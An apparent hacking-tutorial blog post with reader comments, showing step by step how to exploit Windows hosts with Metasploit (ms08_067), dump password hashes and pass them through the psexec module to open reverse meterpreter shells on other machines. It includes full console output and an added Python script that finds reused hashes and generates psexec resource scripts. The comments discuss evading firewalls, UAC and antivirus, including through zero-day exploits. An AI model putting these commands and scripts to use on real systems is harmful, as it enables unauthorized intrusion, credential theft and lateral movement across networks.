Type: Tutorial
Level: Medium, Advanced
The main problem people have with passwords nowadays is that they are hard to remember, which is why they usually reuse the same password for every account and even for every device they own. For example, in a school, university or office with a lot of computers, it is impractical to give every computer a different password, especially when the people using them are not familiar with computers. So the same password is usually set on all of them, because when a problem happens the IT person maintains or remotes into the machine using the standard password they already provided.
In this tutorial, we will compromise one victim computer and dump its password hashes, then log in to another computer that uses the same password by passing the hash itself, with no need to crack the password back to plain text first.
2. Linux operating system or BackTrack 5 (the Metasploit Framework is already included in this distro)
1. First of all you need a vulnerable target; set your payload to run meterpreter when the exploit launches successfully. You can view my previous post about meterpreter search (see step 1). In this example I use the exploit/windows/smb/ms08_067_netapi exploit.

2. Once we are inside the victim computer, we dump the password hashes (meterpreter's hashdump command).
FYI: in this case I use the username victim and assume that every account in that place is also victim (but usually the username is Administrator).

3. Okay, once we have the victim's password hashes, we try to connect to another victim that "maybe" uses the same password (or maybe is on the same network :-p). I use psexec here and set the payload to meterpreter reverse_tcp.

4. You can see what options this exploit and payload have by running show options.
msf exploit(psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOST                       yes       The target address
   RPORT      445              yes       Set the SMB service port
   SHARE      ADMIN$           yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain  WORKGROUP        no        The Windows domain to use for authentication
   SMBPass                     no        The password for the specified username
   SMBUser                     no        The username to authenticate as

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic
Legend:
RHOST = remote host, the target IP address
SMBPass = the password hash (psexec accepts the LM:NT hash pair here in place of a plaintext password)
SMBUser = the username to authenticate as
LHOST = the address of our own attacking computer
5. Those are the options we need to set, and below is my configuration on my BackTrack 5 box.

6. After everything is set up correctly, launch the exploit command.
msf exploit(psexec) > exploit

[*] Started reverse handler on 192.168.8.90:4444
[*] Connecting to the server...
[*] Authenticating to 192.168.8.95:445|WORKGROUP as user 'victim'...
[*] Uploading payload...
[*] Created \hMnZxVRG.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.8.92[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.8.92[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (nRxylOJY - "MIkxdjvELJLYUpzSEqmpscBGIwls")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \hMnZxVRG.exe...
[*] Sending stage (752128 bytes) to 192.168.8.95
[*] Meterpreter session 2 opened (192.168.8.90:4444 -> 192.168.8.95:1068) at 2011-07-16 01:26:24 +0800

meterpreter > shell
Process 1876 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>
Below is my screenshot:
That's it! We are on another computer. We successfully connected to a separate computer with the same credentials, without having to crack the password at all. The key point is that Windows NT hashes are unsalted, so an account with the same password on two machines has the same hash on both, and psexec can present that hash directly for SMB authentication.
Hope it's useful.
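The procedure above in code, as an added example that is not part of the original tutorial: it computes an NT hash the way Windows does (unsalted MD4 over the UTF-16LE password, which is why a dumped hash works on every host that shares the password), parses meterpreter hashdump output from two hosts, picks out the accounts whose NT hash is identical on both, and emits the msfconsole resource-script lines that set SMBPass to the LM:NT pair for exploit/windows/smb/psexec. The hashdump lines, the host addresses 192.168.8.95/192.168.8.96 and the listener address 192.168.8.90 are constructed for the example; the LM column is shown as the empty-LM value here, although XP-era hosts usually store a real LM hash too.

```python
import struct
from collections import defaultdict

# Well-known hashes of the empty password (real constants, not assumptions).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
MASK = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); OpenSSL 3 builds of hashlib often lack it."""
    rotl = lambda x, s: ((x << s) | (x >> (32 - s))) & MASK
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):                                   # round 1
            a = rotl((a + f(b, c, d) + x[i]) & MASK, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                                   # round 2
            k = (i % 4) * 4 + i // 4
            a = rotl((a + g(b, c, d) + x[k] + 0x5A827999) & MASK, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                                   # round 3
            k = (0, 8, 4, 12)[i % 4] + (0, 2, 1, 3)[i // 4]
            a = rotl((a + h(b, c, d) + x[k] + 0x6ED9EBA1) & MASK, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)), unsalted: the same password yields the
    same hash on every machine, which is what makes a dumped hash reusable."""
    return md4(password.encode("utf-16-le")).hex()


def parse_hashdump(text: str) -> dict:
    """Parse meterpreter hashdump output (user:rid:lm:nt:::) into {user: (lm, nt)}."""
    creds = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("["):      # skip blanks and [*] status lines
            continue
        user, _rid, lm, nt = line.split(":")[:4]
        creds[user] = (lm.lower(), nt.lower())
    return creds


def shared_accounts(dumps: dict) -> dict:
    """Given {host: creds}, return {(user, nt): [hosts]} for every non-blank NT hash
    seen on more than one host, i.e. the password reuse the tutorial relies on."""
    seen = defaultdict(list)
    for host, creds in dumps.items():
        for user, (_lm, nt) in creds.items():
            if nt != EMPTY_NT:
                seen[(user, nt)].append(host)
    return {k: v for k, v in seen.items() if len(v) > 1}


def psexec_rc(user: str, lm: str, nt: str, targets, lhost: str, lport: int = 4444) -> str:
    """Emit msfconsole resource-script lines (msfconsole -r file.rc) that replay the
    hash through exploit/windows/smb/psexec; SMBPass takes LM:NT instead of a password."""
    if nt == EMPTY_NT:
        raise ValueError(f"{user}: blank password, nothing to pass")
    if len(lm) != 32 or len(nt) != 32:
        raise ValueError(f"{user}: LM and NT hashes must be 32 hex chars each")
    lines = ["use exploit/windows/smb/psexec",
             "set PAYLOAD windows/meterpreter/reverse_tcp",
             f"set LHOST {lhost}", f"set LPORT {lport}",
             f"set SMBUser {user}", f"set SMBPass {lm}:{nt}"]
    for t in targets:
        lines += [f"set RHOST {t}", "exploit -j"]
    return "\n".join(lines) + "\n"


# Constructed sample data (assumptions for this example): hashdump output from two
# hosts; 'victim' has the password "password" on both, Administrator differs per host.
HOST_A, HOST_B, LHOST = "192.168.8.95", "192.168.8.96", "192.168.8.90"
DUMP_A = f"""[*] Obtaining the boot key...
Administrator:500:{EMPTY_LM}:{nt_hash('S3cretA')}:::
Guest:501:{EMPTY_LM}:{EMPTY_NT}:::
victim:1003:{EMPTY_LM}:8846f7eaee8fb117ad06bdd830b7586c:::
"""
DUMP_B = f"""Administrator:500:{EMPTY_LM}:{nt_hash('S3cretB')}:::
victim:1003:{EMPTY_LM}:8846f7eaee8fb117ad06bdd830b7586c:::
"""

if __name__ == "__main__":
    dumps = {HOST_A: parse_hashdump(DUMP_A), HOST_B: parse_hashdump(DUMP_B)}
    for (user, nt), hosts in shared_accounts(dumps).items():
        lm = dumps[hosts[0]][user][0]
        print(f"# {user} shares NT hash {nt} on {hosts}")
        print(psexec_rc(user, lm, nt, hosts, LHOST))
```

Run it as a script to print the resource script for every account whose hash repeats across the dumps; the Guest account is skipped because its NT hash is the empty-password value, which psexec has nothing to pass for.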
awesome post.. thanks a lot
I tried everything… and no luck
[*] Creating a new service (MpAgHiEE – “MIgX”)…
[*] Closing service handle…
[*] Opening service…
[*] Starting the service…
[-] Error: DCERPC FAULT => nca_s_fault_ndr
[*] Exploit completed, but no session was created.
Can you help me?
#Amigo
what’s this? PsExec with metasploit?
Yes… (exploit/windows/smb/psexec)
BTW… I found the problem, a firewall
How do you disable a firewall (not windows firewall) remotely?
thank you for your time.
#Amigo
I have no idea about that; there are a hundred or more firewalls available on the net, each with different behavior.
I encountered this problem. Turn off the firewall remotely via Windows Manager, then connect to that machine via host name. However, in a pure Windows environment (YOU MUST KNOW THE PASSWORD) on the remote machine. Be aware that there are DOS commands you can use to turn off a firewall remotely; however, it cannot be done directly. Using pure Windows tools and nothing else, it is unlikely the firewall will get turned off unless your target is using an admin account and you trick them into executing a program or batch file of sorts, but wait. If there is an antivirus program running, it will more likely stop this action. A good estimate would be that 99% of any action without more advanced tools will get stopped. Experimenting in a lab of hard knocks and solving real-world problems when you MUST access a remote machine in another city, state or across the world truly tests admins every day. What is interesting here is that there are a series of facts that have been left out that truly require a lab environment to test. I must commend the web master for bringing this information to light, no matter how old it is. When you see something, be sure to share it with your friends who are interested in the details. Understanding the details will give you a better knowledge of why.
#James
Hi James, yes, all the tutorials here need to be tested first in your own lab. Your analysis was correct, because most AV will catch it as a virus. If you want an exploit that is not detected by antivirus, maybe you can find an exploit with zero-day status that has just come fresh out of the oven, so you need to run fast before the AV detects it.
Because for every exploit or vulnerability that comes out or is written about on the internet, all the humans (who use the internet) in this world will see that information, including the antivirus companies, which will end with a "patch" for that exploit and vulnerability.
Hello, good morning.
I need help from you. Right now I have a hard problem with Windows 7 UAC.
The details as following :
I used msf/scanner/smb/smb_login and found USERNAME: administrator, PASSWORD: 1234qwer.
Then I want to link into my goal (Windows 7 (6.1.7601 Service Pack 1 Build 7601)). But I have to create the shell or use psexec. It is a great pity that it does not work because of UAC.
Can you tell me how to create the shell or upload the payload? Many thanks for your help in advance.
#c4bbage
You can view the tutorial here: http://www.hacking-tutorial.com/tips-and-trick/13-metasploit-meterpreter-file-system-command-you-should-know/ or here: http://www.hacking-tutorial.com/hacking-tutorial/10-steps-to-use-netcat-as-a-backdoor-in-windows-7-system/
This week and last I did some extensive work with psexec and discovered, while at work in a secured environment, that antivirus has to be turned off, and to remote execute, the share has to be active and you have to be admin on both machines or submit a password for an account on the remote machine. I believe everything we learn here requires a network with no antivirus software activated, because in the real world, or at least my world, some of these things will not work. Unless your antivirus program is AVG- I'm just sayin~